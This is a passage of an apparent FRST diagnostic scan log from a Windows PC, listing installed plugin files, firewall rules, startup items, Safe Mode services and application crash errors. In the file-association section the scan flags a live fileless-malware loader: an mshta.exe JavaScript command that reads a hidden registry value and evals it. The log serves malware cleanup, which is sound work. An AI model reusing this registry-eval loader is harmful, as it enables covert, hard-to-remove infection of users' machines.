Express\Plugins\2D\HueShift.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00416920 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Invert.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00417432 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\InvertAlpha.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00424600 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\JitterFrames.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00463000 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\LensBlur.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00422552 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Letterbox.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00536728 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Levels.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00898712 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\LightFlares.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00528024 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Lightning.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00485016 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\LightWrap.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00423064 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\LuminanceKey.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00494232 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Magnify.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00449688 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\MatteCleaner.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00422552 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Mosaic.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00662680 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\MotionBlur.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00498840 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\NeonGlow.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00422040 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Noise.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00453272 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\OilPainting.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00603800 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Parallax.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00429720 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\PerspectiveWarp.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00728216 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Photorama.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00473752 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\PolarWarp.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00444056 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\PondRipple.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00778392 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Portal.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00481944 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Posterize.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00499352 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\QuadWarp.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00468120 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\RadialBlur.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00483480 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\RadialGradient.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00497816 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\RadioWaves.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00580760 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\RainOnGlass.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00481944 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Ramp.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00465048 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Reflection.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00418968 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\RemoveFringe.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00417432 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Reverse.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00469656 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\SetMatte.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00442008 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Shake.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00431256 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Sharpen.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00423576 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Solarize.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00523928 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Sphere.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00421528 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\SpillSuppressor.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00420504 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ThreeStripColor.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00423064 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Threshold.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00466584 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Tiles.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00476824 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Timecode.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00531608 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\TimeDisplace.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00422552 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Tint.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00468120 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Twirl.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00424600 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\TwoStripColor.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00477848 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Unsharpen.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00470168 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Vignette.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00469656 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\VignetteExposure.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00535192 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\WarpVortex.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00539800 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Waves.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00418968 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\WhiteBalance.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00532632 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\WitnessProtection.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00467096 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ZoomBlur.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00155288 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\AudioEcho.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00152216 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\AudioReverse.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00062616 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\Balance.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00908440 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\Cathedral.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00061080 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\ChannelLevels.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00908440 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\LargeRoom.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00908440 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\MediumRoom.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00709272 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\Pitch.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00707736 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\ShortwaveRadio.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00908440 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\SmallRoom.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00711832 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\Telephone.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00061080 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\Tone.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00060568 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\AudioTransitions\Fade.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00418456 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\AdditiveDissolve.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00424088 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\ClockWipe.hfpl 2016-06-22 03:08 - 2016-06-22 03:08 - 00417944 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\CrossDissolve.hfpl 2016-06-22 03:09 - 2016-06-22 03:09 - 00417944 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\CrossZoom.hfpl 2016-06-22 03:09 - 2016-06-22 03:09 - 00417944 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\DitherDissolve.hfpl 2016-06-22 03:09 - 2016-06-22 03:09 - 00418968 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\Fade.hfpl 2016-06-22 03:09 - 2016-06-22 03:09 - 00428696 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\Iris.hfpl 2016-06-22 03:09 - 2016-06-22 03:09 - 00421528 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\LinearWipe.hfpl 2016-06-22 03:09 - 2016-06-22 03:09 - 00418968 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\PushTransition.hfpl 2016-06-22 03:09 - 2016-06-22 03:09 - 00421528 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\RadialWipe.hfpl 2016-06-22 03:09 - 2016-06-22 03:09 - 00419480 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\SlideTransition.hfpl 2016-06-22 03:09 - 2016-06-22 03:09 - 00422040 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\Split.hfpl 2016-06-22 03:09 - 2016-06-22 03:09 - 00421528 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\Zoom.hfpl 2016-06-22 03:09 - 2016-06-22 03:09 - 00300696 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Skyway_Guard.exe 2016-06-22 03:29 - 2016-06-22 03:29 - 01062040 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\ffmpeg.dll 2016-06-22 03:29 - 2016-06-22 03:29 - 02749080 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\libglesv2.dll 2016-06-22 03:29 - 2016-06-22 03:29 - 00093336 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\libegl.dll 2016-06-22 03:29 - 2016-06-22 03:29 - 03790488 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\node.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0] AlternateDataStreams: C:\ProgramData\Temp:74603393 [144] ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SplashtopRemoteService => ""="Service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Software\Classes\5623e: "C:\WINDOWS\system32\mshta.exe" "javascript:i8S1mD="m";n40z=new ActiveXObject("WScript.Shell");fuLa2="SrL4";f81HSI=n40z.RegRead("HKCU\\software\\dcyozhn\\eyzxwqjdey");mrBn9="j1V1";eval(f81HSI);adKr6SBm="t0nh";" <===== ATTENTION ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) IE restricted site: HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\youtube.com -> www.youtube.com ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2013-08-22 06:25 - 2013-08-22 06:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Control Panel\Desktop\\Wallpaper -> E:\Misc\IMG_9250.JPG DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == HKLM\...\StartupApproved\StartupFolder: => "Microsoft Office.lnk" HKLM\...\StartupApproved\StartupFolder: => "Microsoft Works Calendar Reminders.lnk" HKLM\...\StartupApproved\Run: => "SimplePass" HKLM\...\StartupApproved\Run: => "OPBHOBroker" HKLM\...\StartupApproved\Run: => "OPBHOBrokerDesktop" HKLM\...\StartupApproved\Run: => "iTunesHelper" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "ADSKAppManager" HKLM\...\StartupApproved\Run32: => "ADSK DLMSession" HKLM\...\StartupApproved\Run32: => "iSkysoft Helper Compact.exe" HKLM\...\StartupApproved\Run32: => "PMBVolumeWatcher" HKLM\...\StartupApproved\Run32: => "WorksFUD" HKLM\...\StartupApproved\Run32: => "Microsoft Works Portfolio" HKLM\...\StartupApproved\Run32: => "Microsoft Works Update Detection" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "Skype" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "Google Update" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "OneDrive" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "Power2GoExpress8" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "BlueStacks Agent" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "iFunBox" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "MurGee.com Auto Clicker" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [UDP Query User{53794421-7821-4278-8BBF-741BA05AB330}C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe FirewallRules: [TCP Query User{9FCA62F9-825D-496E-A932-0EED1260581B}C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe FirewallRules: [{F14C8E4E-1B46-4AAC-97D1-94D40AE20ABA}] => (Allow) C:\Program Files\FlightGear 2016.2.1\bin\fgcom.exe FirewallRules: [{8B921A85-A429-4280-B9FB-07CB855F9AEE}] => (Allow) C:\Program Files\FlightGear 2016.2.1\bin\fgfs.exe FirewallRules: [{57F389DB-7222-4A70-83D6-662C742B15A0}] => (Allow) LPort=8317 FirewallRules: [{85C86D16-7CBD-49DB-AD69-7F297733EC65}] => (Allow) LPort=50001 FirewallRules: [{E1826D7F-6D7B-41D9-BB8B-73EFFEB1E640}] => (Allow) C:\Program Files\iTunes\iTunes.exe FirewallRules: [{C8D63CDD-CB45-41E6-9676-C5235F513E50}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe FirewallRules: [{A6035642-EFF6-4D3F-A471-8F29A46FE381}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe FirewallRules: [{29458CC2-9F5A-4226-8F16-B8DCC1E9A280}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{9C04F057-2474-485A-B328-06C86CBE9AF6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{8078B494-1CD1-4E93-AF3D-325569171D51}] => (Allow) LPort=50000 FirewallRules: [{A2CCF995-5E8E-4066-80A8-AA998DCA6A80}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe FirewallRules: [{44AEF0DF-9B4D-4FE6-B6E4-2BDE8ABE5EE1}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe FirewallRules: [{3DD8C92C-1E2B-4B13-9BD8-0C413D7304F6}] => (Allow) C:\Users\Kyle Aniel\AppData\Roaming\McAfee\Supportability\MVTLogs\ProductDetection64.exe FirewallRules: [{09095BAF-CFEA-4A62-A961-97CE70C0F14D}] => (Allow) C:\Users\Kyle Aniel\AppData\Roaming\McAfee\Supportability\MVTLogs\ProductDetection64.exe FirewallRules: [{22A807EF-5700-42AB-AD50-A9315FFB0ACF}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe FirewallRules: [{9F5506B2-FE5A-45A6-BE89-593AF24DA79D}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{149713C0-3A5B-4BA5-9CEC-10624D856994}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{50A74DE0-4CF0-4436-A417-756FC22CFA0B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{0C08375C-3256-4D97-8C0C-F3B798874E9D}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{87934DC9-BB42-4A76-977F-7DB1AA22CE30}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe FirewallRules: [{81D09C49-FCFC-4576-ADAB-3228E5E5812F}] => (Allow) LPort=1900 FirewallRules: [{0BD45850-ADD6-4FB8-9763-A7803A529714}] => (Allow) LPort=2869 FirewallRules: [{3E5C0A9A-8603-4FD0-9015-B81E4B910642}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{3C2C253A-75CC-4267-90E2-CFA17D99C597}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe FirewallRules: [{80D6559F-AA11-4937-9A76-F8F47B0FA5A9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe FirewallRules: [{63D829A9-1866-46EE-BE65-46FFC2EF34C7}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe FirewallRules: [{37F2FF54-CA8C-421C-A6D7-C3E7998F3851}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe FirewallRules: [{035BCD7C-7394-4029-A70D-306939C141B5}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe FirewallRules: [{7DE873A1-B04A-4DC4-BF07-72452AA6769A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{EB8518E6-0C53-4592-A329-17FF4E03C814}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{C4117717-1BF8-4083-B45B-8E65BE340653}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{A009DA25-1808-4BF7-8594-F809220AD544}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{DA464FB2-57C0-4998-85E8-54A7D16F808D}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\FaxApplications.exe FirewallRules: [{31F26292-472F-4FFC-AA3A-0278395E83A7}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\DigitalWizards.exe FirewallRules: [{9BF7603D-8F7C-4E49-ABCC-C7311B6E0DA8}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\SendAFax.exe FirewallRules: [{6026A0A4-DCD7-419C-8407-81503532C00B}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\Bin\DeviceSetup.exe FirewallRules: [{A783AA3C-A803-45F8-9270-860CE2C449BC}] => (Allow) LPort=5357 FirewallRules: [{69728B7B-B5FA-48E5-A57A-8AC7AD8CFD35}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\Bin\HPNetworkCommunicatorCom.exe FirewallRules: [{94C72F18-5920-4207-99C7-3139704D79E1}] => (Allow) LPort=50000 FirewallRules: [{BC519CD9-D5BF-4289-AB5D-F134CBA183D7}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe FirewallRules: [{2646CD7C-C5DA-4EDC-8811-98E05D23D1AF}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe FirewallRules: [{761227BA-3A0B-4783-9D92-5A778653F022}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{A5A81B4C-BC6A-4AB7-8DF4-428AB39C529D}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\52.0.2743.48\remoting_host.exe FirewallRules: [TCP Query User{0E400244-55F2-4995-BDAF-BE37DE126EA3}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe FirewallRules: [UDP Query User{8C40C563-77CF-4CD6-B606-00A658B175BC}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe FirewallRules: [TCP Query User{AF159B5F-F569-4FC3-A426-0F45CF62F1A6}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe FirewallRules: [UDP Query User{DFC2E528-A381-4BB4-A766-40F096B52695}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe FirewallRules: [TCP Query User{B075427D-FA99-437A-9826-8B8E82766740}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe FirewallRules: [UDP Query User{FCC68B87-C0F9-4AAF-9801-459975C199C8}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe FirewallRules: [TCP Query User{B6438A5A-55C1-49AF-8357-63FE07103FF9}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe FirewallRules: [UDP Query User{BECDF835-CCAA-4B58-8415-09AAFE18C14E}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe FirewallRules: [{FFF440EE-CA61-4F63-9BDB-A0B57D138FC9}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRManager.exe ==================== Restore Points ========================= ATTENTION: System Restore is disabled Check "winmgmt" service or repair WMI. ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (10/19/2016 02:59:37 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Exception code: 0xc0000005 Fault offset: 0x000000000018c770 Faulting process id: 0x346c Faulting application start time: 0x01d22a53812dc309 Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Report Id: e63ed0b1-db94-43c9-b525-1b5a427fd077 Faulting package full name: Faulting package-relative application ID: Error: (10/19/2016 02:58:49 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program chrome.exe version 53.0.2785.143 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: 2578 Start Time: 01d22a537b963ef2 Termination Time: 339 Application Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Report Id: 0ec5a952-9647-11e6-855f-8cdcd48f3756 Faulting package full name: Faulting package-relative application ID: Error: (10/19/2016 02:58:26 PM) (Source: Application Error) (EventID: 1005) (User: ) Description: Windows cannot access the file for one of the following reasons: there is a problem with the network connection, the disk that the file is stored on, or the storage drivers installed on this computer; or the disk is missing. Windows closed the program gramblr.exe because of this error. Program: gramblr.exe File: The error value is listed in the Additional Data section. User Action 1. Open the file again. This situation might be a temporary problem that corrects itself when the program runs again. 2. If the file still cannot be accessed and - It is on the network, your network administrator should verify that there is not a problem with the network and that the server can be contacted. - It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer. 3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER. 4. If the problem persists, restore the file from a backup copy. 5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for further assistance. Additional Data Error value: 00000000 Disk type: 0 Error: (10/19/2016 02:58:26 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: gramblr.exe, version: 0.0.0.0, time stamp: 0x57fef5a9 Faulting module name: gramblr.exe, version: 0.0.0.0, time stamp: 0x57fef5a9 Exception code: 0xc0000096 Fault offset: 0x0000000000517889 Faulting process id: 0xb50 Faulting application start time: 0x01d22a50c86b3f9d Faulting application path: C:\Program Files\Gramblr\gramblr.exe Faulting module path: C:\Program Files\Gramblr\gramblr.exe Report Id: becbead0-356f-4889-ae6c-c4e4e2b51e6e Faulting package full name: Faulting package-relative application ID: Error: (10/19/2016 02:56:39 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Kyle-PC) Description: Activation of app Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (10/19/2016 02:52:43 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Exception code: 0xc0000005 Fault offset: 0x000000000018c795 Faulting process id: 0x3098 Faulting application start time: 0x01d22a52aa7adbda Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Report Id: 